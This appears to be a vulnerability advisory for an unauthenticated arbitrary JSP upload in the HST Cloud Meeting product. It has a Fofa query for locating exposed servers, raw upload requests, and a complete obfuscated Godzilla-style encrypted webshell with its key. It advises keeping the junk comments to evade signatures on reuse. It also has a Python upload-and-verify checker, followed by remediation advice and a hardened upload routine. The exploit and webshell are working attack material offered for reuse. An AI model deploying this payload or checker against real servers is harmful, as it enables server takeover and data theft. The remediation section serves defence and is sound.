0x01 Product description:
HST Cloud Meeting (好视通云会议) is an efficient, convenient, low-cost network video conferencing product. Users log in to the HST cloud platform from a PC or phone and can immediately hold real-time audio/video sessions with teams anywhere in the world while sharing documents and other data. The vendor advertises low cost, ease of use, high security, smooth HD audio/video and several interaction modes, and the product is deployed across many scenarios and platforms.
0x02 Vulnerability description:
The upLoad2 interface of HST Cloud Meeting (/fm/systemConfig/upLoad2.jsp) has an arbitrary file upload vulnerability. The endpoint accepts a multipart upload with any file name and extension, and the reproduction below sends no session cookie or other credentials. An attacker can therefore upload arbitrary files to the server, including a JSP webshell or other backdoor, and the uploaded file is served and executed from /fm/upload/, which gives the attacker control of the server.
0x03 Search query:
Fofa:body="/loginCheck.do?accessType=isTrueCode" || app="好视通-云会议"
0x04 Reproduction:
First upload a harmless probe. Note the empty line between the HTTP headers and the body, and the empty line between each part's headers and its content; without them the request is not valid multipart/form-data.
POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip

--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream

<% out.print("test"); %>
--1515df1sdfdsfddfs--
After the upload, append the file name to the upload directory and request it. The response body should be the string test, which proves the JSP was not just stored but compiled and executed by the container:
http://your-ip/fm/upload/test.jsp
Webshell upload. The payload below is a Godzilla-style AES-encrypted JSP shell: the key hard-coded in the source (dfff0a7fa1a55c8c) is the one the client must be configured with, the request body is a base64, AES/ECB-encrypted class that the shell loads through ClassLoader.defineClass, and the junk comments (/*Zkpo2uFw7n*/) are there to evade signature matching, so leave them as they are if you reuse it:
POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip

--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="rce.jsp"
Content-Type: application/octet-stream

<%! public byte[] AuS06(String Strings,String k) throws Exception { javax.crypto.Cipher B7734F = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");B7734F.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));byte[] bytes;try{int[] aa = new int[]{122, 113, 102, 113, 62, 101, 100, 121, 124, 62, 82, 113, 99, 117, 38, 36};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr); Object decoder = clazz.getMethod("getDecoder").invoke(null);bytes = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, Strings);}catch (Throwable e){int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr);bytes = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), Strings);}byte[] result = (byte[]) B7734F.getClass()./*Zkpo2uFw7n*/getDeclaredMethod/*Zkpo2uFw7n*/("doFinal", new Class[]{byte[].class}).invoke(B7734F,new Object[]{bytes});return result;} %><% try { String KXU8J67 = "dfff0a7fa1a55c8c"; session.putValue("u", KXU8J67); byte[] I5T4357 = AuS06 (request.getReader().readLine(),KXU8J67); java./*Zkpo2uFw7n*/lang./*Zkpo2uFw7n*/reflect.Method AuS06 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Zkpo2uFw7n*/("defineClass",byte[].class,int/**/.class,int/**/.class); AuS06.setAccessible(true); Class i = (Class)AuS06.invoke(Thread.currentThread()./*Zkpo2uFw7n*/getContextClassLoader(), I5T4357 , 0, I5T4357.length); Object Q6G6 = i./*Zkpo2uFw7n*/newInstance(); Q6G6.equals(pageContext); } catch (Exception e) {} %>
--1515df1sdfdsfddfs--
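The reproduction above as a small Python helper. This is an added example, not code from the advisory or from the vendor: it builds the same multipart request, uploads the harmless probe under a random name, fetches it back from /fm/upload/ and classifies the result. The endpoint, upload directory and probe body are taken from the requests above; the base URL, the timeout and the random probe name are assumptions.

```python
"""Checker for the HST Cloud Meeting upLoad2.jsp arbitrary upload (added example).

Endpoint, upload directory and probe body come from the advisory; base_url,
timeout and the probe file name are assumptions of this script.
"""
import secrets
import urllib.error
import urllib.request

UPLOAD_PATH = "/fm/systemConfig/upLoad2.jsp"  # vulnerable endpoint (from the advisory)
UPLOAD_DIR = "/fm/upload/"                    # where uploads land (from the advisory)
PROBE_BODY = '<% out.print("test"); %>'       # harmless probe, same as the advisory
PROBE_MARKER = "test"


def build_multipart(filename, content, field="file", boundary=None):
    """Return (Content-Type header value, body bytes) for a one-file multipart POST.

    Mirrors the advisory's request: a single part named `field`, the
    client-supplied file name, octet-stream content, CRLF line endings and the
    blank line between part headers and part body that multipart requires.
    """
    if boundary is None:
        boundary = "----hst" + secrets.token_hex(8)
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    ).encode()
    return f"multipart/form-data; boundary={boundary}", body


def judge_probe(status, body, marker=PROBE_MARKER):
    """Classify the GET on /fm/upload/<name>.

    'executed'            - 200 and the body is exactly the marker: the JSP ran.
    'stored_not_executed' - 200 but the raw JSP source came back: upload works,
                            but this directory is not compiled as JSP (weaker finding).
    'not_found'           - anything other than 200: no file or not served.
    'unknown'             - 200 with an unrelated body (error page, login redirect).
    """
    if status != 200:
        return "not_found"
    text = body.strip()
    if text == marker:
        return "executed"
    if "out.print" in text:
        return "stored_not_executed"
    return "unknown"


def check(base_url, timeout=10):
    """Upload a probe with a random name and fetch it back; returns the verdict.

    base_url is an assumption, e.g. "http://your-ip:8080". The random name
    avoids overwriting a file a previous tester left behind.
    """
    name = f"probe_{secrets.token_hex(4)}.jsp"
    ctype, body = build_multipart(name, PROBE_BODY)
    req = urllib.request.Request(
        base_url + UPLOAD_PATH, data=body, method="POST",
        headers={"Content-Type": ctype, "Accept-Encoding": "identity"},
    )
    try:
        urllib.request.urlopen(req, timeout=timeout).read()
    except urllib.error.HTTPError:
        pass  # the upload response code is not what decides the verdict
    try:
        with urllib.request.urlopen(base_url + UPLOAD_DIR + name, timeout=timeout) as r:
            return judge_probe(r.status, r.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        return judge_probe(e.code, e.read().decode(errors="replace"))


if __name__ == "__main__":
    import sys
    print(check(sys.argv[1]))
```

Record the random probe name in the report so it can be deleted afterwards; the endpoint offers no way to remove it. The distinction between executed and stored_not_executed matters for severity: both mean the upload check is missing, but only the first is immediate code execution.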
0x05 Remediation:
First make sure the system restricts uploads to the extensions it actually needs, as an allowlist rather than a blocklist. Then make sure the file name cannot contain anything that would be interpreted as a directory or a traversal sequence (../). Rename uploaded files on the server so that a client-chosen name cannot collide with, and overwrite, an existing file, and disable execution in the directory that stores uploads. For a JSP application the last point means keeping the upload directory outside the servlet container's web application, or otherwise ensuring the container never compiles files there: the reproduction above shows test.jsp executing straight from /fm/upload/, so file-system permission bits alone are not enough.
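The four controls above as one validation-and-store routine. This is an added example, not the vendor's patch: the real application is Java/JSP, so this Python shows the logic to apply, not a drop-in fix. The extension allowlist, the upload root and the file mode are assumptions.

```python
"""Hardened upload handling (added example, not the vendor's code).

Implements the remediation's controls: extension allowlist, no path or traversal
content from the client, server-chosen file name, no overwrite, no execute bit.
ALLOWED_EXT and UPLOAD_ROOT are assumptions for the example.
"""
import os
import pathlib
import secrets

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".pdf", ".docx"}   # assumption: what the app actually needs
UPLOAD_ROOT = pathlib.Path("/var/hst/uploads")            # assumption: outside the web app, never served as JSP


class UploadRejected(ValueError):
    """Raised for any client file name that fails validation."""


def safe_upload_name(client_filename):
    """Validate the client-supplied name and return the server-chosen name.

    The client's name is used for exactly one thing: choosing the extension.
    Everything else (directories, traversal, inner extensions) is discarded.
    """
    # 1. Keep only the final path component, so "../../webapps/ROOT/x.jsp" or
    #    "C:\\x\\y.jsp" cannot steer where the file is written.
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise UploadRejected("empty or traversal-only name")
    # 2. A NUL byte can truncate the name in a lower layer; refuse it outright.
    if "\x00" in base:
        raise UploadRejected("NUL byte in file name")
    # 3. Allowlist the extension. rce.jsp, a.JSP, a.jspx and names with no
    #    extension are all rejected here.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext or '(none)'} not allowed")
    # 4. Server-chosen random name with only the checked extension. This is
    #    what neutralises "shell.jsp.png": the inner .jsp never reaches disk,
    #    and a random name cannot collide with an existing file.
    return secrets.token_hex(16) + ext


def is_accepted(client_filename):
    """True if safe_upload_name would accept the name (convenience for tests/logs)."""
    try:
        safe_upload_name(client_filename)
        return True
    except UploadRejected:
        return False


def store_upload(client_filename, data, root=UPLOAD_ROOT):
    """Write `data` under `root` using a validated, server-chosen name; return its path."""
    root = pathlib.Path(root).resolve()
    name = safe_upload_name(client_filename)
    dest = (root / name).resolve()
    if dest.parent != root:  # belt and braces: the name is ours, but check containment anyway
        raise UploadRejected("path escapes upload root")
    # O_EXCL: fail rather than overwrite. 0o640: readable by the service, no execute bit.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return dest
```

The missing piece that code alone cannot supply is the deployment side: UPLOAD_ROOT must not be a directory the servlet container maps and compiles, and anything served back to users should go through a download handler that sets Content-Type from the stored extension rather than letting the container guess.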